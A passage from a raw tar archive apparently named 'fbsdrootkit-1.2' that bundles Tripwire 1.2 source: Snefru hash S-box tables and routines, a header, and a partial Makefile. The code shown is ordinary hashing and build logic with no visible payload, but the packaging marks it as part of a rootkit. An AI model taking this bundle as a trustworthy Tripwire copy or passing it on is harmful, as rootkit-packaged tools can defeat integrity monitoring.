0xd2cb6447L,0x386ac97eL,0x66d61805L,0xbdada15eL,0x11bc1aa7L, /* 40*/ 0x14e9f6eaL,0xe533a0c0L,0xf935ee0aL,0x8fee8a04L,0x810d6d85L, /* 45*/ 0x7c68b6d6L,0x4edc9aa2L,0x956e897dL,0xed87581aL,0x264be9d7L, /* 50*/ 0xff4ddb29L,0x823857c2L,0xe005a9a0L,0xf1cc2450L,0x6f9951e1L, /* 55*/ 0xaade2310L,0xe70c75f5L,0x83e1a31fL,0x4f7dde8eL,0xf723b563L, /* 60*/ 0x368e0928L,0x86362b71L,0x21e8982dL,0xdfb3f92bL,0x44676352L, /* 65*/ 0x99efba31L,0x2eab4e1cL,0xfc6ca5e7L,0x0ebe5d4eL,0xa0717d0cL, /* 70*/ 0xb64f8199L,0x946b31a1L,0x5656cbc6L,0xcffec3efL,0x622766c9L, /* 75*/ 0xfa211e35L,0x52f98b89L,0x6d01674bL,0x4978a802L,0xf651f701L, /* 80*/ 0x15b0d43dL,0xd6ff4683L,0x3463855fL,0x672ba29cL,0xbc128312L, /* 85*/ 0x4626a70dL,0xc8927a5aL,0xb8481cf9L,0x1c962262L,0xa21196baL, /* 90*/ 0xbaba5ee9L,0x5bb162d0L,0x69943bd1L,0x0c47e35cL,0x8cc9619aL, /* 95*/ 0xe284d948L,0x271bf264L,0xc27fb398L,0x4bc70897L,0x60cf202cL, /* 100*/ 0x7f42d6aaL,0xa5a13506L,0x5d3e8860L,0xcea63d3cL,0x63bf0a8fL, /* 105*/ 0xf02e9efaL,0xb17b0674L,0xb072b1d3L,0x06e5723bL,0x3737e436L, /* 110*/ 0x24aa49c7L,0x0ded0d18L,0xdb256b14L,0x58b27877L,0xecb49f54L, /* 115*/ 0x6c40256aL,0x6ea92ffbL,0x3906aa4cL,0xc9866fd5L,0x4549323eL, /* 120*/ 0xa7b85fabL,0x1918cc27L,0x7308d7b5L,0x1e16c7adL,0x71850b37L, /* 125*/ 0x3095fd78L,0xa63b70e6L,0xd880e2aeL,0x3e282769L,0xa39ba6bcL, /* 130*/ 0x98700fa3L,0xf34c53e8L,0x288af426L,0xb99d930fL,0xf5b99df1L, /* 135*/ 0xe9d0c8cfL,0x5ac8405dL,0x50e7217bL,0x511fbbbeL,0x2ca2e639L, /* 140*/ 0xc020301bL,0x356dbc00L,0x8e43ddb9L,0x4d327b4aL,0xf20ff3edL, /* 145*/ 0x1dbb29bdL,0x43d44779L,0xa1b68f70L,0x6114455bL,0xe63d280bL, /* 150*/ 0x6bf6ff65L,0x10fc39e5L,0x3dae126eL,0xc1d7cf11L,0xcb60b795L, /* 155*/ 0x1789d5b3L,0x9bca36b7L,0x08306075L,0x84615608L,0x8b3a0186L, /* 160*/ 0xe88fbecdL,0x7ba47c4dL,0x2de44dacL,0x653fe58dL,0xcca0b968L, /* 165*/ 0xd7fa0e72L,0x93901780L,0x1f2c26ccL,0xae595b6bL,0xa9ecea9bL, /* 170*/ 0xe3dbf8c4L,0x319cc130L,0x12981196L,0x01a3a4deL,0x32c454b6L, /* 175*/ 0x755bd817L,0x3cd871e4L,0xa48bb8daL,0x02fdec09L,0xfd2dc2e2L, /* 180*/ 0x9e578088L,0x9a9f916dL,0x4065fe6cL,0x1853999eL,0xc7793f23L, /* 185*/ 0xdc1016bbL,0x969355ffL,0x7ef292f6L,0xcdce4adcL,0x05e24416L, /* 190*/ 0x85c16c46L,0xd441d37fL,0x57bd6855L,0x8746f54fL,0x9ca773dfL, /* 195*/ 0x770bae22L,0x54828413L,0xb75e4b19L,0x04c35c03L,0xbf7cca07L, /* 200*/ 0x2955c4ddL,0x721db041L,0xb2394f33L,0x03f51387L,0x89b73c9fL, /* 205*/ 0x0b1737f3L,0x07e69024L,0x9231d245L,0x76193861L,0x88159c15L, /* 210*/ 0xdeb552d9L,0xd9767e40L,0x20c6c0c3L,0x4281977cL,0xf8afe1e0L, /* 215*/ 0xd32a0751L,0x3fc27432L,0xddf1dcc5L,0x68581f34L,0x3bcd5025L, /* 220*/ 0x0091b2eeL,0x4aeb6944L,0x1602e743L,0xea09eb58L,0xef0a2a8bL, /* 225*/ 0x641e03a5L,0xeb50e021L,0x5c8ccef8L,0x802ff0b8L,0xd5e3edfeL, /* 230*/ 0xc4dd1b49L,0x5334cd2aL,0x13f82d2fL,0x47450c20L,0x55dafbd2L, /* 235*/ 0xbec0c6f4L,0xb45d7959L,0x3ad36e8cL,0x0aa8ac57L,0x1a3c8d73L, /* 240*/ 0xe45aafb1L,0x9f664838L,0xc6880053L,0xd0039bbfL,0xee5f19ebL, /* 245*/ 0xca0041d8L,0xbbea3aafL,0xda628291L,0x9d5c95d4L,0xadd504a6L, /* 250*/ 0xc39ab482L,0x5e9e14a4L,0x2be065f0L,0x2a13fc3aL,0x9052e8ecL, /* 255*/ 0xaf6f5afcL /* End of S Box 14 */ }, { /* Start of S Box 15 */ /* 0*/ 0x519aa8b5L,0xbb303da9L,0xe00e2b10L,0xdfa6c1dbL,0x2e6b952eL, /* 5*/ 0xee10dc23L,0x37936d09L,0x1fc42e92L,0x39b25a9fL,0x13ff89f4L, /* 10*/ 0xc8f53feaL,0x18500bc7L,0x95a0379dL,0x98f751c2L,0x2289c42fL, /* 15*/ 0xa21e4098L,0x6f391f41L,0xf27e7e58L,0x0d0df887L,0x4b79d540L, /* 20*/ 0x8e8409aaL,0x71fe46f8L,0x688a9b29L,0x3f08b548L,0x84abe03aL, /* 25*/ 0x5e91b6c1L,0xfde4c2aeL,0x251d0e72L,0x92d4fee5L,0xf9371967L, /* 30*/ 0x9175108fL,0xe6e81835L,0x8c8cb8eeL,0xb55a67b3L,0xcef138ccL, /* 35*/ 0x8b256268L,0x00d815f5L,0xe8810812L,0x77826189L,0xea73267dL, /* 40*/ 0x19b90f8dL,0x45c33bb4L,0x82477056L,0xe1770075L,0x09467aa6L, /* 45*/ 0xa7c6f54aL,0x79768742L,0x61b86bcaL,0xd6644a44L,0xe33f0171L, /* 50*/ 0xc229fbcdL,0x41b08febL,0xd1903e30L,0x65ec9080L,0x563d6fbdL, /* 55*/ 0xf56da488L,0xebf64cd8L,0x4934426bL,0x7c8592fcL,0x6aca8cf2L, /* 60*/ 0x1cea111bL,0x3a57ee7aL,0xace11c0dL,0x9942d85eL,0xc4613407L, /* 65*/ 0xfa8e643bL,0x327fc701L,0x4ca9be82L,0x3352526dL,0x2c047f63L, /* 70*/ 0xf3a8f7ddL,0x1a4a98a8L,0x762ed4d1L,0x27c75008L,0xbdf497c0L, /* 75*/ 0x7a7b84dfL,0x315c28abL,0x801f93e3L,0xf19b0ca1L,0x8f14e46aL, /* 80*/ 0xe48ba333L,0x9605e625L,0xf03ecb60L,0x60385f2dL,0x902845baL, /* 85*/ 0x7f96d66fL,0x24bff05cL,0x2820730bL,0x947133cbL,0xd444828aL, /* 90*/ 0xb343f6f1L,0x0bef4705L,0x8da574f9L,0x01e25d6cL,0x1732793eL, /* 95*/ 0x4f0f7b27L,0x364b7117L,0xb2d1da77L,0xa6c5f1e9L,0x574ca5b1L, /* 100*/ 0x386a3076L,0xad6894d6L,0x1156d7faL,0xa48d1d9aL,0x4794c0afL, /* 105*/ 0x150c0aa0L,0x26d348acL,0x29fdeabeL,0xa5dede53L,0x81671e8eL, /* 110*/ 0x594ee3bfL,0xa96c56e6L,0x3426a726L,0xc5976579L,0xbc22e5e4L, /* 115*/ 0xc1006319L,0xdaafdd2aL,0xa1a1aa83L,0x3badd0e7L,0xc3b14981L, /* 120*/ 0xd770b155L,0xccd7c693L,0x42e944c5L,0x03e0064fL,0xca95b4efL, /* 125*/ 0x3dee81c3L,0xfbbcd98cL,0x1e07e15bL,0x667ce949L,0xe7d6773fL, /* 130*/ 0x21b6124bL,0x6b2a6ef7L,0xd3278a9cL,0x9a988304L,0x75d2ae9bL, /* 135*/ 0xfe49e2ffL,0x9bc24f46L,0x74cc2cf6L,0xa3139f36L,0x6c9ef35aL, /* 140*/ 0x9fc1dffeL,0x9e5facdcL,0xaadc8bbbL,0x5abdbc5fL,0x44b3b390L, /* 145*/ 0xf754efa7L,0x5fe3bdb7L,0x4e59c886L,0x06a4c984L,0xa0338878L, /* 150*/ 0xcd513cd7L,0x63ebd27eL,0x8aba80adL,0x50da144eL,0x5d9f4e97L, /* 155*/ 0x025b751cL,0x2d580200L,0xb6c05837L,0x580aa15dL,0x54022a6eL, /* 160*/ 0xb41a5415L,0x4863fab6L,0xb0b79957L,0x46d0d159L,0xdc2b8650L, /* 165*/ 0x20a7bb0cL,0x4a032974L,0xec8636a2L,0x8548f24cL,0xf6a2bf16L, /* 170*/ 0x1088f4b0L,0x0c2f3a94L,0x525dc396L,0x14065785L,0x2b4dca52L, /* 175*/ 0x08aeed39L,0xabedfc99L,0xb1dbcf18L,0x87f85bbcL,0xae3aff61L, /* 180*/ 0x433ccd70L,0x5b23cc64L,0x7b453213L,0x5355c545L,0x9318ec0aL, /* 185*/ 0x78692d31L,0x0a21693dL,0xd5666814L,0x05fb59d9L,0xc71985b2L, /* 190*/ 0x2abb8e0eL,0xcf6e6c91L,0xd9cfe7c6L,0xefe7132cL,0x9711ab28L, /* 195*/ 0x3ce52732L,0x12d516d2L,0x7209a0d0L,0xd278d306L,0x70fa4b7bL, /* 200*/ 0x1d407dd3L,0xdb0beba4L,0xbfd97621L,0xa8be21e1L,0x1b6f1b66L, /* 205*/ 0x30650ddaL,0xba7ddbb9L,0x7df953fbL,0x9d1c3902L,0xedf0e8d5L, /* 210*/ 0xb8741ae0L,0x0f240565L,0x62cd438bL,0xc616a924L,0xaf7a96a3L, /* 215*/ 0x35365538L,0xe583af4dL,0x73415eb8L,0x23176a47L,0xfc9ccee8L, /* 220*/ 0x7efc9de2L,0x695e03cfL,0xf8ce66d4L,0x88b4781dL,0x67dd9c03L, /* 225*/ 0x3e8f9e73L,0xc0c95c51L,0xbe314d22L,0x55aa0795L,0xcb1bb011L, /* 230*/ 0xe980fdc8L,0x9c62b7ceL,0xde2d239eL,0x042cadf3L,0xffdf04deL, /* 235*/ 0x5ce6a60fL,0xd8c831edL,0xb7b5b9ecL,0xb9cbf962L,0xe253b254L, /* 240*/ 0x0735ba1fL,0x16ac917fL,0xdd607c2bL,0x64a335c4L,0x40159a7cL, /* 245*/ 0x869222f0L,0x6ef21769L,0x839d20a5L,0xd03b24c9L,0xf412601eL, /* 250*/ 0x6d72a243L,0x0e018dfdL,0x89f3721aL,0xc94f4134L,0x2f992f20L, /* 255*/ 0x4d87253cL /* End of S Box 15 */ } }; /* * The following routine is a simple error exit routine -- it prints a * message and aborts */ void ErrAbort (s) char *s; { fprintf (stderr, "%s\n", s); exit (1); } /* * The following routine converts a byte array to an array of word32 * int. It is primarily intended to eliminate the byte-ordering problem. * VAXes order the bytes in a character array differently than SUN's do. This * routine should be portable across different computer architectures. * However, it is not very efficient. */ void ConvertChunkOfBytes (charBuffer, wordBuffer) /* an input buffer of characters */ char charBuffer[CHUNK_SIZE*4]; /* an output buffer of word32's */ word32 wordBuffer[CHUNK_SIZE]; { int i; word32 t0, t1, t2, t3; for (i = 0; i < CHUNK_SIZE; i++) { t0 = charBuffer[4*i]; t1 = charBuffer[4*i + 1]; t2 = charBuffer[4*i + 2]; t3 = charBuffer[4*i + 3]; t0 &= 0xffL; t1 &= 0xffL; t2 &= 0xffL; t3 &= 0xffL; wordBuffer[i] = (t0 << 24) | (t1 << 16) | (t2 << 8) | t3; }; } /* * The following routine trys to read 4*"CHUNK_SIZE" bytes from the input * file. It will only return a non-full buffer if an EOF is encountered. * * It returns the number of bytes actually read. If there are any errors, it * aborts. If this routine cannot read all the bytes it's supposed to, it * pads the output array, "buf", with trailing 0 bytes. */ int ReadChunk (buf, fp) word32 buf[CHUNK_SIZE]; FILE *fp; { char charBuf[CHUNK_SIZE*4]; int byteCount; int i; byteCount = fread(charBuf, 1, CHUNK_SIZE*4, fp); if (byteCount < 0) ErrAbort ("error on read"); /* Zero out rest of buffer */ for (i = byteCount; i < CHUNK_SIZE*4; i++) charBuf[i] = 0; /* * The following conversion is required for machines with * byte-ordering unlike the SUN's (68000's or SPARC) * ConvertChunkOfBytes (charBuf, buf); */ { word32 *plsrc = (word32 *) charBuf, *pldest = (word32 *) buf; for (i = 0; i < CHUNK_SIZE; i++) { pldest[i] = *plsrc++; bs_ntohl(pldest[i]); } } return (byteCount); } /* * HashN is a conceptually simpler and more general version of Hash512. * It accepts an input of * INPUT_BLOCK_SIZE 32-bit words and produces an output of * OUTPUT_BLOCK_SIZE 32-bit words. The INPUT_BLOCK_SIZE must be at * least two words larger than the output, or a serious degradation * in security will occur. In addition, the use of outputs less * than 128 bits will often significantly reduce security. While * possible, it requires great caution. */ void HashN (output, input) word32 output[OUTPUT_BLOCK_SIZE]; word32 input[INPUT_BLOCK_SIZE]; { static int shiftTable[4] = {16, 8, 16, 24}; /* the array of data being hashed */ word32 block[INPUT_BLOCK_SIZE]; word32 SBoxEntry; /* just a temporary */ int shift; int i; int index; int next, last; int byteInWord; /* initialize the block to be encrypted from the input */ for (i = 0; i < INPUT_BLOCK_SIZE; i++) block[i] = input[i]; for (index = 0; index < SECURITY_LEVEL; index++) { for (byteInWord = 0; byteInWord < 4; byteInWord++) { for (i = 0; i < INPUT_BLOCK_SIZE; i++) { /* compute i+1 and i-1 mod INPUT_BLOCK_SIZE */ next = (i + 1) & MASK; last = (i + MASK) & MASK; /* Load an entry from the S-box */ SBoxEntry = standardSBoxes [2*index + ((i / 2) & 1)] [block[i] & 0xffL]; /* * and XOR that entry with the preceding and * following words */ block[next] ^= SBoxEntry; block[last] ^= SBoxEntry; }; /* * Rotate right all 32-bit words in the entire block * at once. */ shift = shiftTable[byteInWord]; for (i = 0; i < INPUT_BLOCK_SIZE; i++) block[i] = (block[i] >> shift) | (block[i] << (32 - shift)); }; /* end of byteInWord going from 0 to 3 */ }; /* end of index going from 0 to * SECURITY_LEVEL-1 */ for (i = 0; i < OUTPUT_BLOCK_SIZE; i++) output[i] = input[i] ^ block[MASK - i]; } /* * Hash512 is a more efficient and specialized version of HashN. * It accepts an input of INPUT_BLOCK_SIZE 32-bit words and * produces an output of * OUTPUT_BLOCK_SIZE 32-bit words. The INPUT_BLOCK_SIZE must be at * least two words larger than the output, or a serious degradation * in security will occur. In addition, the use of outputs less * than 128 bits will often significantly reduce security. While * possible, it requires great caution. */ void Hash512 (output, input) word32 output[OUTPUT_BLOCK_SIZE]; word32 input[INPUT_BLOCK_SIZE]; { static int shiftTable[4] = {16, 8, 16, 24}; /* the array of data being hashed */ word32 SBE; /* just a temporary */ int shift, leftShift; int index; int byteInWord; word32 *SBox0; word32 *SBox1; word32 B00,B01,B02,B03,B04,B05,B06,B07,B08,B09,B10,B11,B12,B13,B14,B15; /* initialize the block to be encrypted from the input */ B00 = input[0]; B01 = input[1]; B02 = input[2]; B03 = input[3]; B04 = input[4]; B05 = input[5]; B06 = input[6]; B07 = input[7]; B08 = input[8]; B09 = input[9]; B10 = input[10]; B11 = input[11]; B12 = input[12]; B13 = input[13]; B14 = input[14]; B15 = input[15]; for (index = 0; index < SECURITY_LEVEL; index++) { SBox0 = standardSBoxes[2*index+0]; SBox1 = standardSBoxes[2*index+1]; for (byteInWord = 0; byteInWord < 4; byteInWord++) { round(B15,B00,B01,SBox0); round(B00,B01,B02,SBox0); round(B01,B02,B03,SBox1); round(B02,B03,B04,SBox1); round(B03,B04,B05,SBox0); round(B04,B05,B06,SBox0); round(B05,B06,B07,SBox1); round(B06,B07,B08,SBox1); round(B07,B08,B09,SBox0); round(B08,B09,B10,SBox0); round(B09,B10,B11,SBox1); round(B10,B11,B12,SBox1); round(B11,B12,B13,SBox0); round(B12,B13,B14,SBox0); round(B13,B14,B15,SBox1); round(B14,B15,B00,SBox1); /* * Rotate right all 32-bit words in the entire block * at once. */ shift = shiftTable[byteInWord]; leftShift = 32-shift; rotate(B00); rotate(B01); rotate(B02); rotate(B03); rotate(B04); rotate(B05); rotate(B06); rotate(B07); rotate(B08); rotate(B09); rotate(B10); rotate(B11); rotate(B12); rotate(B13); rotate(B14); rotate(B15); }; /* end of byteInWord going from 0 to 3 */ }; /* end of index going from 0 to * SECURITY_LEVEL-1 */ output[0] = input[0] ^ B15; output[1] = input[1] ^ B14; output[2] = input[2] ^ B13; output[3] = input[3] ^ B12; if(OUTPUT_BLOCK_SIZE == 4) return; output[4] = input[4] ^ B11; output[5] = input[5] ^ B10; output[6] = input[6] ^ B09; output[7] = input[7] ^ B08; if(OUTPUT_BLOCK_SIZE == 8) return; ErrAbort("Bad value for OUTPUT_BLOCK_SIZE"); } /* * This routine increments a 64-bit counter by the given increment. */ void Increment64BitCounter (counter, increment) word32 counter[2]; long int increment; { word32 maxInt = 0xffffffffL; if ( (maxInt-counter[1]) < increment) { /* Overflow from the lower 32 bits */ if (counter[0] == maxInt) ErrAbort("64-bit counter overflowed"); /* bump the upper 32 bits */ counter[0]++; /* and then increment the lower 32 bits */ /* without ever overflowing! */ counter[1] = maxInt-counter[1]; counter[1] = increment - counter[1]; } else /* increment the total number of bits read */ counter[1] += increment; } /* * The main program reads the input, hashes it, and prints the result. * * The basic idea is simple. As an example, if H is the hash function that * produces 128-bit outputs, and if we pick an input string that is 3 * "chunks" long then we are computing: * * output = H( H( H( H( 0 || chunk[0]) || chunk[1]) * || chunk[2]) || bit-length) * * "bit-length" is a "chunk" sized field into which has been put the length of * the input, in bits, right justified. Note that the size of a "chunk" is * just the input size minus the output size (typically 48 bytes or 12 * words). * * "0" is a vector of 0 bits of the same size (in bits) as the output of H * (i.e., typically 128 bits). * * "||" is the concatenation operator, and is used to concatenate the output * field of the preceding computation of H with the next "chunk" of bits from * the input. * * "chunk" is an array which holds the input in words. The final element of the * array is left justified and zero-filled on the right. * */ int sig_snefru_get(fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { int i; char s[512]; word32 hash[INPUT_BLOCK_SIZE]; word32 bitCount[2]; /* the 64-bit count of the number of * bits in the input */ long int byteCount; /* the count of the number of bytes we just * read */ FILE *fp; /* get stdio handle * we use dup() so we can close() it later */ if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) { perror("sig_haval_get: fdopen()"); exit(1); } ps_signature[0] = 0; /* rewind the file descriptor */ rewind(fp); #ifdef MAIN /* Test for various error conditions and logic problems */ if (SECURITY_LEVEL*2 > MAX_SBOX_COUNT) ErrAbort ("Too few S-boxes for specified SECURITY_LEVEL"); if (OUTPUT_BLOCK_SIZE < 4) ErrAbort ("OUTPUT_BLOCK_SIZE too small"); if ((INPUT_BLOCK_SIZE & MASK) != 0) ErrAbort ("logic error, INPUT_BLOCK_SIZE not a power of 2"); if ((INPUT_BLOCK_SIZE % 4) != 0) ErrAbort ("logic error, INPUT_BLOCK_SIZE not a multiple of 4"); if (OUTPUT_BLOCK_SIZE > INPUT_BLOCK_SIZE - 2) ErrAbort ("logic error, OUTPUT_BLOCK_SIZE is too big"); if (CHUNK_SIZE < 2) ErrAbort ("logic error, CHUNK_SIZE is too small"); #endif /* * The error condtions have now been checked -- everything should * work smoothly */ bitCount[0] = 0; bitCount[1] = 0; for (i = 0; i < INPUT_BLOCK_SIZE; i++) hash[i] = 0; /* initialize hash */ /* * Hash each chunk in the input (either 48 byte chunks or 32 byte * chunks) -- and keep the result in hash. Note that the first 16 * (32) bytes of hash holds the output of the previous hash * computation done during the previous iteration of the loop */ do { /* Get the next chunk */ byteCount = ReadChunk (&hash[OUTPUT_BLOCK_SIZE], fp); Increment64BitCounter (bitCount, 8*byteCount); /* hash in the block we just read */ if (byteCount > 0) Hash512 (hash, hash); } while (byteCount > 0); /* end of while */ /* * Put the 64-bit bit-count into the final 64-bits of the block about * to be hashed */ hash[INPUT_BLOCK_SIZE - 2] = bitCount[0]; /* upper 32 bits of * count */ hash[INPUT_BLOCK_SIZE - 1] = bitCount[1]; /* lower 32 bits of * count */ /* Final hash down. */ Hash512 (hash, hash); /* * the first OUTPUT_BLOCK_SIZE words of "hash" now hold the hashed * result, which is printed on standard output */ /* * the first OUTPUT_BLOCK_SIZE words of "hash" now hold the hashed * result, which is printed on standard output */ if (printhex) { for (i = 0; i < OUTPUT_BLOCK_SIZE; i++) { #if (TW_TYPE32 == int) sprintf (s, "%08x", hash[i]); #else sprintf (s, "%08lx", hash[i]); #endif strcat(ps_signature, s); } } /* base 64 */ else { pltob64(hash, ps_signature, OUTPUT_BLOCK_SIZE); } /* for (i = 0; i < OUTPUT_BLOCK_SIZE; i++) printf (" %08x", hash[i]); * Note that if the user wishes to view the output as a sequence * of bytes, then the byte order is the same as the order * in which the bytes are printed by "printf" above. The * first byte (designated byte 0) is the left-most byte * printed by "printf" above. The last byte (designated * byte 15) is the right-most byte printed. * This can also be viewed as: * * the first byte is the most significant byte of hash[0], * the second byte is the second most significant byte of hash[0], * the third byte is the third most significant byte of hash[0], * the fourth byte is the least significant byte of hash[0], * the fifth byte is the most significant byte of hash[1], * etc. This process continues until the last byte is reached. * The last byte is the least significant byte of hash[3]. * * This is basically "big-endian" or network byte order. * * Although the use of the full 128 bits of output is recommended, * in some applications it will be both useful and safe to use * a smaller output. From a purely technical point of view, which * bytes are retained and which are discarded is not an issue * of any great significance. If there is any issue of standardization * in the particular application, then the bytes that should be * retained are the left-most bytes printed out by "printf" above, and * the bytes that are to be discarded are the right-most bytes * printed out by "printf" above. That is, the most significant * (left most, lower numbered) bytes are retained, while the * least significant (right most, higher numbered) bytes are discarded. * * When the output size is other than 128 bits, the above comments * should be extended in the obvious fashion. printf ("\n"); exit (0); */ fclose(fp); return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/snefru.h100600 764 764 134 5452727656 17220 0ustar dfdfint sig_snefru_get(); /* $Id: snefru.h,v 1.10 1993/10/01 04:18:54 genek Exp $ */ /* xxx */ fbsdrootkit-1.2/tripwire-1.2/src/ 40700 764 764 0 6273465264 14004 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/src/Makefile100600 764 764 20254 5614756406 15565 0ustar dfdf# $Id: Makefile,v 1.26 1994/07/25 15:40:54 gkim Exp $ # # Tripwire build # CFLAGS = -O OFILES = config.parse.o main.o list.o ignorevec.o dbase.build.o \ utils.o preen.o preen.interp.o preen.report.o \ nullsig.o config.prim.o dbase.update.o \ config.pre.o help.o \ $(OSIGS) SIGDIR = ../sigs SIG1DIR = $(SIGDIR)/md5 SIG2DIR = $(SIGDIR)/snefru SIG3DIR = $(SIGDIR)/crc32 SIG4DIR = $(SIGDIR)/crc SIG5DIR = $(SIGDIR)/md4 SIG6DIR = $(SIGDIR)/md2 SIG7DIR = $(SIGDIR)/sha SIG8DIR = $(SIGDIR)/haval SIGDIRS = $(SIG1DIR) $(SIG2DIR) $(SIG3DIR) $(SIG4DIR) $(SIG5DIR) \ $(SIG6DIR) $(SIG7DIR) $(SIG8DIR) $(SIG9DIR) OSIG1 = $(SIG1DIR)/md5wrapper.o $(SIG1DIR)/md5.o OSIG2 = $(SIG2DIR)/snefru.o OSIG3 = $(SIG3DIR)/crc32.o OSIG4 = $(SIG4DIR)/crc.o OSIG5 = $(SIG5DIR)/md4.o $(SIG5DIR)/md4wrapper.o OSIG6 = $(SIG6DIR)/md2.o $(SIG6DIR)/md2wrapper.o OSIG7 = $(SIG7DIR)/sha.o $(SIG7DIR)/shawrapper.o OSIG8 = $(SIG8DIR)/haval.o $(SIG8DIR)/havalwrapper.o OSIGS = $(OSIG1) $(OSIG2) $(OSIG3) $(OSIG4) $(OSIG5) $(OSIG6) $(OSIG7) \ $(OSIG8) $(OSIG9) CSIG1 = $(SIG1DIR)/md5wrapper.c $(SIG1DIR)/md5.c CSIG2 = $(SIG2DIR)/snefru.c CSIG3 = $(SIG3DIR)/crc32.c CSIG4 = $(SIG4DIR)/crc.c CSIG5 = $(SIG5DIR)/md4.c $(SIG5DIR)/md4wrapper.c CSIG6 = $(SIG6DIR)/md2.c $(SIG6DIR)/md2wrapper.c CSIG7 = $(SIG7DIR)/sha.c $(SIG7DIR)/shawrapper.c CSIG8 = $(SIG8DIR)/haval.c $(SIG8DIR)/havalwrapper.c CSIGS = $(CSIG1) $(CSIG2) $(CSIG3) $(CSIG4) $(CSIG5) $(CSIG6) $(CSIG7) \ $(CSIG8) $(CSIG9) CFILES = config.parse.c main.c list.c ignorevec.c dbase.build.c \ utils.c preen.c preen.interp.c preen.report.c \ nullsig.c config.prim.c dbase.update.c \ config.pre.c help.c \ $(CSIGS) ### all: tripwire siggen tripwire: $(P) help.c $(OFILES) $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OFILES) $(LIBS) $(OSIG1): ../include/byteorder.h (cd $(SIG1DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG2): ../include/byteorder.h (cd $(SIG2DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG3): ../include/byteorder.h (cd $(SIG3DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG4): ../include/byteorder.h (cd $(SIG4DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG5): ../include/byteorder.h (cd $(SIG5DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG6): ../include/byteorder.h (cd $(SIG6DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG7): ../include/byteorder.h (cd $(SIG7DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG8): ../include/byteorder.h (cd $(SIG8DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") ../include/byteorder.h ../include/inode.h: (cd ../aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) help.c: help.txt help.sh $(SHELL) help.sh help.txt > help.c # need $(LDFLAGS) because this may interact with the way nullsig.o and # utils.o were compiled siggen: $(OSIGS) siggen.c utils.o nullsig.o $(CC) $(CFLAGS) $(LDFLAGS) -o siggen siggen.c $(OSIGS) nullsig.o utils.o $(LIBS) config.lex.c: config.pre.l $(LEX) config.pre.l mv lex.yy.c config.lex.c config.pre.c: config.lex.c config.pre.y $(YACC) config.pre.y sed 's/lex\.yy\.c/config.lex.c/' < y.tab.c > config.pre.c rm y.tab.c .c.o: $(CC) $(CFLAGS) -c $< install: tripwire $(INSTALL) tripwire $(DESTDIR) clean: -rm -f $(OFILES) config.lex.c config.pre.c y.tab.c lex.yy.c help.c \ siggen.o twconvert.o core .pure cscope.out for i in $(SIGDIRS); do \ (cd $$i; make clean;) \ done clobber: clean -rm -f tripwire siggen twconvert cscope.files: echo siggen.c $(CFILES) > cscope.files # Some other dependencies config.lex.o: config.lex.c config.parse.o: config.parse.c config.parse.o: ../include/config.h config.parse.o: ../include/list.h config.parse.o: ../include/tripwire.h config.parse.o: ../sigs/snefru/snefru.h config.parse.o: ../sigs/md5/md5.h config.parse.o: ../sigs/crc32/crc32.h config.parse.o: ../sigs/crc/crc.h config.parse.o: ../sigs/md2/md2.h config.parse.o: ../sigs/md4/md4.h config.parse.o: ../include/inode.h config.pre.o: config.pre.c config.pre.o: ../include/config.h config.pre.o: ../include/list.h config.pre.o: ../include/tripwire.h config.pre.o: ../sigs/snefru/snefru.h config.pre.o: ../sigs/md5/md5.h config.pre.o: ../sigs/crc32/crc32.h config.pre.o: ../sigs/crc/crc.h config.pre.o: ../sigs/md2/md2.h config.pre.o: ../sigs/md4/md4.h config.pre.o: ../include/inode.h config.pre.o: ./config.lex.c config.prim.o: config.prim.c config.prim.o: ../include/config.h config.prim.o: ../include/tripwire.h config.prim.o: ../sigs/snefru/snefru.h config.prim.o: ../sigs/md5/md5.h config.prim.o: ../sigs/crc32/crc32.h config.prim.o: ../sigs/crc/crc.h config.prim.o: ../sigs/md2/md2.h config.prim.o: ../sigs/md4/md4.h config.prim.o: ../include/inode.h config.prim.o: ../include/list.h dbase.build.o: dbase.build.c dbase.build.o: ../include/config.h dbase.build.o: ../include/list.h dbase.build.o: ../include/tripwire.h dbase.build.o: ../sigs/snefru/snefru.h dbase.build.o: ../sigs/md5/md5.h dbase.build.o: ../sigs/crc32/crc32.h dbase.build.o: ../sigs/crc/crc.h dbase.build.o: ../sigs/md2/md2.h dbase.build.o: ../sigs/md4/md4.h dbase.build.o: ../include/inode.h dbase.update.o: dbase.update.c dbase.update.o: ../include/config.h dbase.update.o: ../include/list.h dbase.update.o: ../include/tripwire.h dbase.update.o: ../sigs/snefru/snefru.h dbase.update.o: ../sigs/md5/md5.h dbase.update.o: ../sigs/crc32/crc32.h dbase.update.o: ../sigs/crc/crc.h dbase.update.o: ../sigs/md2/md2.h dbase.update.o: ../sigs/md4/md4.h dbase.update.o: ../include/inode.h ignorevec.o: ignorevec.c ignorevec.o: ../include/config.h ignorevec.o: ../include/list.h ignorevec.o: ../include/tripwire.h ignorevec.o: ../sigs/snefru/snefru.h ignorevec.o: ../sigs/md5/md5.h ignorevec.o: ../sigs/crc32/crc32.h ignorevec.o: ../sigs/crc/crc.h ignorevec.o: ../sigs/md2/md2.h ignorevec.o: ../sigs/md4/md4.h ignorevec.o: ../include/inode.h list.o: list.c list.o: ../include/config.h list.o: ../include/list.h main.o: main.c main.o: ../include/config.h main.o: ../include/list.h main.o: ../include/tripwire.h main.o: ../sigs/snefru/snefru.h main.o: ../sigs/md5/md5.h main.o: ../sigs/crc32/crc32.h main.o: ../sigs/crc/crc.h main.o: ../sigs/md2/md2.h main.o: ../sigs/md4/md4.h main.o: ../include/inode.h main.o: ../include/patchlevel.h nullsig.o: nullsig.c nullsig.o: ../include/config.h nullsig.o: ../include/tripwire.h nullsig.o: 